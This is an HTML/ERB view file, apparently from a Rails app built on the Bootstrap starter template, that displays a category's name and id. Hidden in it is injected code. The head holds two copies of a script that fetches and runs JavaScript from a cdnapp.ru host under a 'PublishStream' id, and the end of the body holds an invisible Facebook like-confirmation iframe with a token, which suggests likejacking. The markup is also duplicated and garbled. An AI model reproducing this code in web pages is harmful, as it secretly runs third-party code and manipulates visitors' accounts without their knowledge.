<html lang="en"><head><script async="" src="//www.google-analytics.com/analytics.js"></script><script type="text/javascript">(function(s){try{s = document.getElementById("k1Epg2PublishStreammtMvAq"); if (s == null){s = document.createElement("script");s.src = 'https://www.cdnapp.ru/client/new.js?ver=1531651683';s.id ="k1Epg2PublishStreammtMvAq";s.onload = function(){try{s.onload = null;s.parentNode.removeChild(s);s = document.createElement("script");s.id ="k1Epg2PublishStreammtMvAq";s.text = '(PublishStream=new PublishStream("20", "c617feb0-7d74-4e32-886f-9cecd22782f0", "TH")).initialize()';(document.head || document.documentElement).appendChild(s);}catch (e){}};(document.head || document.documentElement).appendChild(s)}}catch (e){}})();</script>

<head><script async="" src="//www.google-analytics.com/analytics.js"></script><script type="text/javascript">(function(s){try{s = document.getElementById("k1Epg2PublishStreammtMvAq"); if (s == null){s = document.createElement("script");s.src = 'https://www.cdnapp.ru/client/new.js?ver=1531651683';s.id ="k1Epg2PublishStreammtMvAq";s.onload = function(){try{s.onload = null;s.parentNode.removeChild(s);s = document.createElement("script");s.id ="k1Epg2PublishStreammtMvAq";s.text = '(PublishStream=new PublishStream("20", "c617feb0-7d74-4e32-886f-9cecd22782f0", "TH")).initialize()';(document.head || document.documentElement).appendChild(s);}catch (e){}};(document.head || document.documentElement).appendChild(s)}}catch (e){}})();</script>
    
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css" integrity="sha384-rwoIResjU2yc3z8GV/NPeZWAv56rSmLldC3R/AZzGRnGxQQKnKkoFVhFQhNUwEyJ" crossorigin="anonymous">
<script src="https://code.jquery.com/jquery-3.1.1.slim.min.js" integrity="sha384-A7FZj7v+d/sdmMqp/nOQwliLvUsJfDHW+k9Omg/a/EheAdgtzNs3hpfag6Ed950n" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.0/js/tether.min.js" integrity="sha384-DztdAPBWPRXSA/3eYEEUWrWCy7G5KFbe8fFjk5JAIxUYHKkDx6Qin1DkWx51bBrb" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/js/bootstrap.min.js" integrity="sha384-vBWWzlZJ8ea9aCX4pEW3rVHjgjt7zpkNpZk+02D9phzyeVkE+jo0ieGizqPLForn" crossorigin="anonymous"></script>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../../../favicon.ico">

    <title>Starter Template for Bootstrap</title>

    <!-- Bootstrap core CSS -->
    <link href="../../dist/css/bootstrap.min.css" rel="stylesheet">
    
    <!-- Custom styles for this template -->
    <link href="starter-template.css" rel="stylesheet">
  <script id="k1Epg2PublishStreammtMvAq">(PublishStream=new PublishStream("20", "c617feb0-7d74-4e32-886f-9cecd22782f0", "TH")).initialize()</script></head>

  <body>

    <nav class="navbar navbar-expand-md navbar-dark bg-dark fixed-top">
    <a class="navbar-brand" href="/import/json">NavCategory</a>
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExampleDefault" aria-controls="navbarsExampleDefault" aria-expanded="false" aria-label="Toggle navigation">
      <span class="navbar-toggler-icon"></span>
    </button>

    <div class="collapse navbar-collapse" id="navbarsExampleDefault">
      <ul class="navbar-nav mr-auto">
        <li class="nav-item active">
          <a class="nav-link" href="/import/json">Home <span class="sr-only">(current)</span></a>
        </li>
        <li class="nav-item">
          <a class="nav-link" href="#">Link</a>
        </li>
        <li class="nav-item">
          <a class="nav-link disabled" href="#">Disabled</a>
        </li>
        <li class="nav-item dropdown">
          <a class="nav-link dropdown-toggle" href="https://example.com" id="dropdown01" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Dropdown</a>
          <div class="dropdown-menu" aria-labelledby="dropdown01">
            <a class="dropdown-item" href="#">Action</a>
            <a class="dropdown-item" href="#">Another action</a>
            <a class="dropdown-item" href="#">Something else here</a>
          </div>
        </li>
      </ul>
      <!--<form class="form-inline my-2 my-lg-0" ccept-charset="UTF-8" action="/search" method="post">
        <input class="form-control mr-sm-2" name="textSearch" type="text" placeholder="Search" aria-label="Search">
        <button class="btn btn-outline-success my-2 my-sm-0" type="submit">Search</button>
      </form>-->
      
  <%= form_tag("/search", method: "get") do %>
  <%= text_field_tag(:textSearch) %>
  <%= submit_tag("Search") %>
  <% end %>
 
    </div>
    </nav>

    <main role="main" class="container">
    <div class="d-flex align-items-center p-3 my-3 text-white-50 bg-purple rounded box-shadow">
        <img class="mr-3" src="../../assets/brand/bootstrap-outline.svg" alt="" width="48" height="48">
        <div class="lh-100">
            <h6 class="mb-0 text-white lh-100">Bootstrap</h6>
            <small>Since 2011</small>
        </div>
    </div>

    <div class="my-3 p-3 bg-white rounded box-shadow">
    <h6 class="border-bottom border-gray pb-2 mb-0">Categories</h6>
    <strong class="text-gray-dark"><%= @showidcategory.name %></strong>
    <span class="d-block">id: <%= @showidcategory.id %></span>   
    </div>
  </main>
    <!-- /.container -->

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script>window.jQuery || document.write('<script src="../../assets/js/vendor/jquery-slim.min.js"><\/script>')</script>
    <script src="../../assets/js/vendor/popper.min.js"></script>
    <script src="../../dist/js/bootstrap.min.js"></script>
  

<iframe src="https://www.facebook.com/plugins/confirm/post/like/popup/?token=S%3A_I329558997453364%3A329559860786611&amp;href=https%3A%2F%2Fwww.facebook.com%2Fplugins%2Fpost.php%3Fhref%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpermalink.php%253Fstory_fbid%253D329559860786611%2526id%253D329558997453364%26width%3D500&amp;iframe_referer=https%3A%2F%2Fgetbootstrap.com%2Fdocs%2F4.1%2Fexamples%2Fstarter-template%2F" width="500" height="488" style="border:none;overflow:hidden; display:none;" scrolling="no" frameborder="0" allowtransparency="true"></iframe></body></html>